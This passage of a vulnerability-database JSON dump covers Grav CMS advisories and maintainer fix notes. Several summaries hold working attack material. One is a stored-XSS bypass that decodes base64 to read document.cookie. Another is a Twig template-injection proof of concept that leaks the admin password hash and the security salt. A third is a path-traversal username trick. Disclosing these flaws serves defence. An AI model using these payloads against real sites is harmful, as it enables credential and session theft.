src=\"https://github.com/user-attachments/assets/c7ed7e61-8dcf-402d-8589-98d18978c71a\" />\n\n\n**Execution Details:**\nThe `onerror` event is written without quotes to bypass the regex. Because unquoted attributes are restricted in their character usage (e.g., the `=` symbol cannot be used easily), the payload leverages `atob()` and regex `.source` to decode the base64 string `YWxlcnQoZG9jdW1lbnQuY29va2llKQ` (which translates to `alert(document.cookie)`). The `atob()` function conveniently auto-completes the necessary `=` padding for the base64 string.\n\n### Impact\n- **Vulnerability Type:** Stored Cross-Site Scripting (XSS)\n- **Impacted Parties:** Any user (including administrators) who views the compromised content published by the attacker.\n- **Consequences:** Attackers can execute malicious scripts in a victim's browser, leading to session hijacking (cookie theft), unauthorized actions.\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`5a12f9be8`](https://github.com/getgrav/grav/commit/5a12f9be8) — will ship in **2.0.0-beta.2**.\n\n**What changed:** the `on_events` regex in `Security::detectXss()` no longer requires quotes or whitespace around `=`. The previous form:\n\n```\n'on_events' => '#(<[^>]+[\\s\\x00-\\x20\\\"\\'\\/])(on\\s*[a-z]+|xmlns)\\s*=[\\s|\\'\\\"].*[\\s|\\'\\\"]>#iUu'\n```\n\nrequired `[\\s|'\"]` immediately after the `=`, so `<img src=x onerror=alert(1)>` slid past. The new regex drops the value-matching tail entirely and just flags the presence of an `on*=` attribute anywhere inside a tag:\n\n```\n'on_events' => '#<[^>]*?[\\s\\x00-\\x20\\\"\\'\\/](on\\s*[a-z]+|xmlns)\\s*=#iu'\n```\n\nDetecting the attribute name + `=` is enough for a tripwire — the trade-off is occasional false positives on legitimate attribute *values* containing `on*=` substrings, which the maintainer can hand-approve.\n\nThis same regex bypass was the detection-layer half of GHSA-c2q3-p4jr-c55f and GHSA-w8cg-7jcj-4vv2; the fix here knocks both down.\n\n**Files:**\n- [`system/src/Grav/Common/Security.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Security.php).\n- [`tests/unit/Grav/Common/Security/DetectXssTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/DetectXssTest.php) — 18 cases: unquoted PoCs, quoted-form regression, safe-content negatives.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42612", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.0996", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42612" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:52:35Z/" } ], "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-9695-8fr9-hw5q", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:52:35Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-9695-8fr9-hw5q" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42612", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42612" }, { "reference_url": "https://github.com/advisories/GHSA-9695-8fr9-hw5q", "reference_id": "GHSA-9695-8fr9-hw5q", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-9695-8fr9-hw5q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api", "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-aa7e-n85b-wbdm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2" } ], "aliases": [ "CVE-2026-42612", "GHSA-9695-8fr9-hw5q" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c9jy-y2dh-x3dg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93148?format=api", "vulnerability_id": "VCID-e61c-rd9y-wyhs", "summary": "Grav Vulnerable to Sensitive Information Disclosure via Accounts Service Bypass\n## Summary\nInformation disclosure exists in `Grav CMS v1.8.0-beta.29`. Despite previous security patches (notably in `v1.8.0-beta.27/28`) aimed at restricting sensitive object access within the Twig environment, the Accounts Service remains exposed.\n\nA low-privileged user (EX: Content Editor with only pages.update permissions) can bypass the existing Twig sandbox restrictions by utilizing the `grav['accounts']` service. Attacker can programmatically load administrative user objects and extract sensitive data, including Bcrypt password hashes and the security salt.\n\n## Affected version\nGrav CMS: `v1.8.0-beta.29` (and earlier 1.8.x beta versions).\n\nNote: This vulnerability persists even after the vendor attempted to mitigate similar SSTI vectors in earlier beta releases.\n\n## Steps to Reproduce\n1. Create a low-privileged account (MY CASE IS 'editor_chen') with permissions limited to admin.login and basic page management (create, update, list). Ensure all administrative permissions (Configuration, User Accounts, ...) are explicitly Denied.\n\n2. Login to the Admin panel using `editor_chen`. Navigate to Pages and edit the `Home` page.\n\n\n3. Under the Advanced tab, ensure Process Twig is enabled .\n\n4. In the Content tab, inject the following Twig payload designed to bypass the `isDangerousFunction` filter by accessing the internal service container:\n```\n---\ntitle: Information Disclosure Test\nprocess:\n twig: true\n---\n# Security Audit Results\n- Admin Password Hash: {{ grav['accounts'].load('admin').get('hashed_password') }}\n- Security Salt: {{ grav.config.get('security.salt') }}\n```\n<img width=\"1176\" height=\"618\" alt=\"GRAV\" src=\"https://github.com/user-attachments/assets/7970216a-2dc6-4d1b-8dfd-b64f3712c9c5\" />\n\n\n5. Click Save. And navigate to the public page (`http://localhost:8000/home`). Page will render and display the administrator's Bcrypt hash and the system security salt.\n<img width=\"1278\" height=\"462\" alt=\"GRAV2\" src=\"https://github.com/user-attachments/assets/33b7b894-6ae3-4d29-bd2d-8004e9b343e0\" />\n\n\n\n\n\n\n\n## PoC\n```\n---\ntitle: Information Disclosure Test\nprocess:\n twig: true\n---\n# Security Audit Results\n- Admin Password Hash: {{ grav['accounts'].load('admin').get('hashed_password') }}\n- Security Salt: {{ grav.config.get('security.salt') }}\n```\n\n## Impact\nAttackers can obtain the password hashes of all registered users, including Super Administrators.\n\nExtracted hashes can be subjected to offline brute-force or dictionary attacks (EX: USE Hashcat)\n\n## Video\nPls refer to the attached video\n<video src=\"https://github.com/user-attachments/assets/74d5ae41-7911-4099-b2cc-e6c51b27c68c\" controls=\"controls\" style=\"max-width: 100%;\">\n</video>\n\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`d904efc33`](https://github.com/getgrav/grav/commit/d904efc33) — will ship in **2.0.0-beta.2**.\n\n**What changed:** the HMAC key formerly stored as `security.salt` in `user/config/security.yaml` has moved **out of the Config tree** into `user/config/security-private.php`. On upgrade, the existing salt value is migrated into the new file on first request (preserving CSRF nonces and sessions) and the key is scrubbed from both the live `Config` object and the on-disk YAML — so `{{ grav.config.get('security.salt') }}` from a sandboxed Twig template now returns null. The `.php` extension is blocked from web access by the default `user/*.php` htaccess rule; the file contains only a `return` statement, so direct PHP exec produces no output either.\n\nThe PoC's password-hash half (`grav['accounts'].load('admin').get('hashed_password')`) was already covered by the new Twig content sandbox in 2.0.0-beta.2 — `UserCollection::load` is not in the sandbox allowlist — see the separate GHSA-58hj-46fw-rcfm advisory.\n\n**Files:**\n- [`system/src/Grav/Common/Security.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Security.php) — new `Security::getNonceKey()` + migration.\n- [`system/src/Grav/Common/Utils.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Utils.php) — `generateNonceString` now uses the new key.\n- [`system/src/Grav/Common/Service/SessionServiceProvider.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Service/SessionServiceProvider.php).\n- [`system/src/Grav/Common/Config/Setup.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Config/Setup.php) — removed auto-gen of `security.salt`.\n- [`system/config/security.yaml`](https://github.com/getgrav/grav/blob/2.0/system/config/security.yaml) — removed placeholder `salt:`.\n- [`tests/unit/Grav/Common/Security/NonceKeySecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/NonceKeySecurityTest.php) — migration + generation coverage.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42610", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.08191", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42610" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T15:49:51Z/" } ], "url": "https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-3f29-pqwf-v4j4", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T15:49:51Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-3f29-pqwf-v4j4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42610", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42610" }, { "reference_url": "https://github.com/advisories/GHSA-3f29-pqwf-v4j4", "reference_id": "GHSA-3f29-pqwf-v4j4", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-3f29-pqwf-v4j4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api", "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-aa7e-n85b-wbdm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2" } ], "aliases": [ "CVE-2026-42610", "GHSA-3f29-pqwf-v4j4" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e61c-rd9y-wyhs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56433?format=api", "vulnerability_id": "VCID-egxp-rctq-xyh8", "summary": "Grav Cross-site Scripting vulnerability\nA cross-site scripting (XSS) vulnerability in Grav v1.7.45 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-35498", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35687", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-35498" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/r4vanan/Stored-xss-Grav-v1.7.45", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-07T15:42:33Z/" } ], "url": "https://github.com/r4vanan/Stored-xss-Grav-v1.7.45" }, { "reference_url": "https://r4vanan.medium.com/a-quick-dive-into-xss-vulnerability-in-grav-cms-v1-7-45-cve-2024-35498-fc236b7d74a0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-07T15:42:33Z/" } ], "url": "https://r4vanan.medium.com/a-quick-dive-into-xss-vulnerability-in-grav-cms-v1-7-45-cve-2024-35498-fc236b7d74a0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35498", "reference_id": "CVE-2024-35498", "reference_type": "", "scores": [ { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35498" }, { "reference_url": "https://github.com/advisories/GHSA-m78c-qx99-mvw9", "reference_id": "GHSA-m78c-qx99-mvw9", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-m78c-qx99-mvw9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/81408?format=api", "purl": "pkg:composer/getgrav/grav@1.7.46", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a375-aqzf-r7gw" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-rj4b-8dyu-juen" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" }, { "vulnerability": "VCID-ymnw-h6as-fbe5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.46" } ], "aliases": [ "CVE-2024-35498", "GHSA-m78c-qx99-mvw9" ], "risk_score": 1.4, "exploitability": "0.5", "weighted_severity": "2.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-egxp-rctq-xyh8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49302?format=api", "vulnerability_id": "VCID-esjd-ztwe-c3h1", "summary": "Grav vulnerable to Path traversal / arbitrary YAML write via user creation leading to Account Takeover / System Corruption\nWhen a user with privilege of user creation creates a new user through the Admin UI and supplies a username containing path traversal sequences (for example ..\\Nijat or ../Nijat), Grav writes the account YAML file to an unintended path outside user/accounts/. The written YAML can contain account fields such as email, fullname, twofa_secret, and hashed_password. In my tests, I was able to cause the Admin UI to write the following content into arbitrary .yaml files (including files like email.yaml, system.yaml, or other site YAML files like admin.yaml) — demonstrating arbitrary YAML write / overwrite via the Admin UI.\n\nExample observed content written by the Admin UI (test data):\nusername: ..\\Nijat\nstate: enabled\nemail: [EMAIL@gmail.com](mailto:EMAIL@gmail.com)\nfullname: 'Nijat Alizada'\nlanguage: en\ncontent_editor: default\ntwofa_enabled: false\ntwofa_secret: RWVEIHC2AFVD6FCR6UHCO3DS4HWXKKDT\navatar: { }\nhashed_password: $2y$10$wl9Ktv3vUmDKCt8o6u2oOuRZr1I04OE0YZf2sJ1QcAherbNnk1XVC\naccess:\nsite:\nlogin: true", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66295", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.27961", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66295" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:04:26Z/" } ], "url": "https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66295", "reference_id": "CVE-2025-66295", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66295" }, { "reference_url": "https://github.com/advisories/GHSA-h756-wh59-hhjv", "reference_id": "GHSA-h756-wh59-hhjv", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h756-wh59-hhjv" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-h756-wh59-hhjv", "reference_id": "GHSA-h756-wh59-hhjv", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:04:26Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-h756-wh59-hhjv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66295", "GHSA-h756-wh59-hhjv" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-esjd-ztwe-c3h1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49308?format=api", "vulnerability_id": "VCID-f3wx-5ayr-tqga", "summary": "Grav Admin Plugin vulnerable to Cross-Site Scripting (XSS) Stored endpoint `/admin/config/site` parameter `data[taxonomies]`\nA Stored Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/config/site` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[taxonomies]` parameter. The injected payload is stored on the server and automatically executed in the browser of any user who accesses the affected site configuration, resulting in a persistent attack vector.\n\n---", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66308", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.07273", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66308" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:13:50Z/" } ], "url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66308", "reference_id": "CVE-2025-66308", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66308" }, { "reference_url": "https://github.com/advisories/GHSA-gqxx-248x-g29f", "reference_id": "GHSA-gqxx-248x-g29f", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gqxx-248x-g29f" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f", "reference_id": "GHSA-gqxx-248x-g29f", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:13:50Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66308", "GHSA-gqxx-248x-g29f" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-f3wx-5ayr-tqga" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49334?format=api", "vulnerability_id": "VCID-fmmu-r77k-c7g2", "summary": "Grav vulnerable to Privilege Escalation in Grav Admin: Missing Username Uniqueness Check Allows Admin Account Takeover\nA privilege escalation vulnerability exists in Grav’s Admin plugin due to the absence of username uniqueness validation when creating users.\nA user with the create user permission can create a new account using the same username as an existing administrator account, set a new password/email, and then log in as that administrator. This effectively allows privilege escalation from limited user-manager permissions to full administrator access.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66296", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.19662", "published_at": "2026-06-05T12:55:00Z" } ], "url": 